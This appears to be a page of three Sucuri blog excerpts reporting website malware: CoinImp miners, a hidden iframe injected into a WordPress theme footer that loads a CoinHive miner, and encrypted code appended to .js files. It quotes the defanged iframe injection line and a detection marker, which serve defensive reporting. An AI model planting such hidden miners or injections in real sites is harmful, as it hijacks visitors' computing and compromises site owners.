Categories
Security

CoinImp Cryptominer and Fully Qualified Domain Names

CoinImp Cryptominer and Fully Qualified Domain Names

We are all familiar with the conventional domain name notation, where different levels are concatenated with the full stop character (period).

E.g. “www.example.com”, where “www” is a subdomain, “example” is a second level domain, and “com” is a top level domain.

However, very few know that there is also a DNS root domain and it can be also specified in the fully qualified domain names.

Continue reading CoinImp Cryptominer and Fully Qualified Domain Names at Sucuri Blog.

Categories
Security

Malicious Cryptominers from GitHub

Malicious Cryptominers from GitHub

Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src="hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”>

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU.

Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.

Categories
Security

Massive Admedia/Adverting iFrame Infection

This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing features of this malware are: 32 hex digit comments at the beginning and end of the malicious code. E.g. /*e8def60c62ec31519121bfdb43fa078f*/ This comment is unique on every infected site. Most likely an MD5…

The post Massive Admedia/Adverting iFrame Infection appeared first on Sucuri Blog.